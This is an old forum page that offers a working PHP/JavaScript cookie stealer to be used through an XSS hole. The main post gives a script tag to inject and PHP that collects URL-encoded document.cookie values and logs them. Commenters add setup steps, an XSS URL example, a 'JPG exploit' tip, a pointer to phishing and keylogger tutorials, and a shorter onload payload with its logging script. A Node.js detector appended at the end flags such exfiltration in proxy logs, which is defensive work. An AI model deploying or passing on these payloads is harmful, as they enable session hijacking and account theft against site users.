PHP cookie stealer

Here is a simple proof-of-concept cookie stealer.
To use it you have to exploit an XSS vulnerability and insert (for example) the following code.

<script src="http://url.to/cookiemonster.php"></script>

The file ./cookies.txt must exist and be writable by the script.

<?php
/*
 * Created on 16. april. 2007
 * Created by Audun Larsen (audun@munio.no)
 *
 * Copyright 2006 Munio IT, Audun Larsen
 * 
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
 */

if(strlen($_SERVER['QUERY_STRING']) > 0) {
	$fp=fopen('./cookies.txt', 'a');
	fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
	fclose($fp);
} else {
?>

var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ====================================================================
//       URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that 
// (a) you leave this copyright notice intact, and 
// (b) if you use these functions on a publicly accessible
//     web site you include a credit somewhere on the web site 
//     with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ====================================================================
function URLEncode(str)
{
	// The Javascript escape and unescape functions do not correspond
	// with what browsers actually do...
	var SAFECHARS = "0123456789" +					// Numeric
					"ABCDEFGHIJKLMNOPQRSTUVWXYZ" +	// Alphabetic
					"abcdefghijklmnopqrstuvwxyz" +
					"-_.!~*'()";					// RFC2396 Mark characters
	var HEX = "0123456789ABCDEF";

	var plaintext = str;
	var encoded = "";
	for (var i = 0; i < plaintext.length; i++ ) {
		var ch = plaintext.charAt(i);
	    if (ch == " ") {
		    encoded += "+";				// x-www-urlencoded, rather than %20
		} else if (SAFECHARS.indexOf(ch) != -1) {
		    encoded += ch;
		} else {
		    var charCode = ch.charCodeAt(0);
			if (charCode > 255) {
			    alert( "Unicode Character '" 
                        + ch 
                        + "' cannot be encoded using standard URL encoding.\n" +
				          "(URL encoding only supports 8-bit characters.)\n" +
						  "A space (+) will be substituted." );
				encoded += "+";
			} else {
				encoded += "%";
				encoded += HEX.charAt((charCode >> 4) & 0xF);
				encoded += HEX.charAt(charCode & 0xF);
			}
		}
	} // for
	
	return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img src="'+ownUrl+'?'+cookie+'">';
document.write(html);

<?php
}
?>
Thanks

It looks great, and thank you for your generosity in sharing it with us .... but! Can you please make it easier for people who don't know anything about PHP and its stuff, "like me!" .... In other words, can you make it as ready PHP pages that people can download and then upload to their own sites to use! Just like other "code library sites" that give the code "cut & paste" with a few instructions.
In case you want to send me an email, my address is:
a n k i d o o [at] g m a i l [dot] c o m
thanks again and forgive me for my stupid reply.
have a nice time

Submitted by mirox on Sat, 06/23/2007 - 10:14.
cookie stealer

OK, well, I need to know an HTML code cookie stealer code so I can put it on a MySpace profile,
and email it to me at

YamahaRider848@aol.com. Be all like "put this in your profile and then it will email it to you", or I dunno. I know what I'm doing, kinda, I guess. I'm a noob lol, but I'm learning, so shut up; there is only one way to learn and it's to ask ppl who know, so plz email me at YamahaRider848@aol.com

Submitted by 1478963 on Thu, 07/26/2007 - 04:00.

You can't use HTML, noob; RTFM @ php.net

Submitted by Anonymous (not verified) on Sun, 10/14/2007 - 19:34.

Copy and paste the PHP code into a text and then rename it to .php; you need to upload it to an FTP that allows PHP and allows code writing.

Submitted by Anonymous (not verified) on Sun, 12/23/2007 - 02:05.

Well, you need a free PHP hosting site or your site that allows "write permission" and works with PHP. Copy the PHP code and save the output as Cookie_Monster.php

Be sure to also make a log file called ./cookies.txt

Put that with the rest files in same folder on your site.

Then you can use JPG Exploit to in0bed your evil code

(Works with Internet Explorer)

Remember you need to find XSS exploit before you can use this:

Example: www.site.com/forums/login.asp?=%3Cscript%20src=%22http://url.to/Cookie_M...

That is a hole, but learn more about XSS by Googling it.

Reference:

Using JPG Exploit
1. Open notepad (create new file)
2. Example C0de:
3. Save As... pic.jpg
4. upload to web site
5. view image with Internet Explorer
6. You can use any script you wish.

BEST WISHES!

Submitted by DoZ (not verified) on Sun, 12/23/2007 - 02:17.
Go look here

Hi all. First, can I say that I ain't got a clue where to start here, but I'm a member of www.messblack.com, and on there it gives you tuts on how to use a fake login page and keyloggers. It's a bit easier to understand than this cookie stealing. Go check the site out for yourself, and if you need any help, come on to the forum (off topic) and look for me; my name on there is snugglebums

Submitted by Anonymous (not verified) on Sat, 02/02/2008 - 22:53.
Overcomplicated, and will rarely work

Look, if you want to steal cookies study XSS.
A simple example would be <body onload="document.location='mysite.com/cookiestealer.php?cookie=' + document.cookie">
Then have a simple log script with the get variable on your php server:

<?php
$cookie = urldecode($_GET['cookie']);
$fp = fopen("log.txt", "a");
fwrite($fp, "$cookie \n");
fclose($fp);
?>

Submitted by human_bagel (not verified) on Fri, 02/29/2008 - 04:06.
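
Added example (not part of the original post or its comments): a Node.js check that flags proxy-log requests sending a cookie string to a third-party host, covering both the bare query string produced by the script in the post and the cookie= parameter form from the last comment. The log format, host names and session cookie names are constructed assumptions.

```javascript
// Constructed proxy-log lines (not from the page): "<referer-host> <method> <url>"
const SAMPLE_LOG = [
  'shop.example GET http://cdn.example/app.js?v=42',
  'shop.example GET http://collector.example/cookiemonster.php?PHPSESSID%3Dabc123%3B+theme%3Ddark',
  'shop.example GET http://collector.example/cookiestealer.php?cookie=PHPSESSID%3Dabc123%3B%20uid%3D7',
  'shop.example GET http://shop.example/search.php?q=session+cookies',
  'shop.example GET http://tracker.example/p.gif?id=9&ref=home',
];

// Session cookie names to look for; an assumption, replace with your application's names.
const SESSION_NAMES = ['PHPSESSID', 'JSESSIONID', 'ASP.NET_SessionId'];

// Decode x-www-form-urlencoded text ('+' means space); null if the encoding is malformed.
function formDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return null; }
}

// True when text has the shape of document.cookie ("name=value; name=value")
// and contains at least one known session cookie name.
function looksLikeCookieJar(text) {
  if (!text) return false;
  const pairs = text.split(/;\s*/).filter(Boolean);
  if (!pairs.every(p => /^[^=;\s]+=[^;]*$/.test(p))) return false;
  return pairs.some(p => SESSION_NAMES.includes(p.split('=')[0]));
}

// Inspect one log line; returns null, or the destination host and the matched variant.
function inspect(line) {
  const [refHost, , rawUrl] = line.split(' ');
  let url;
  try { url = new URL(rawUrl); } catch (e) { return null; }
  if (url.hostname === refHost) return null;   // same-site request, not cross-site leakage
  const query = url.search.slice(1);
  if (!query) return null;
  // Variant 1: the whole query string is the encoded cookie string.
  if (looksLikeCookieJar(formDecode(query)))
    return { host: url.hostname, variant: 'bare-query' };
  // Variant 2: the cookie string is the value of a single parameter.
  for (const part of query.split('&')) {
    const eq = part.indexOf('=');
    if (eq > 0 && looksLikeCookieJar(formDecode(part.slice(eq + 1))))
      return { host: url.hostname, variant: 'param:' + part.slice(0, eq) };
  }
  return null;
}

function scan(lines) { return lines.map(inspect).filter(Boolean); }

console.log(scan(SAMPLE_LOG));
```

A session cookie set with the HttpOnly attribute is not exposed through document.cookie, so a hit here also shows which cookies are still readable by script.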
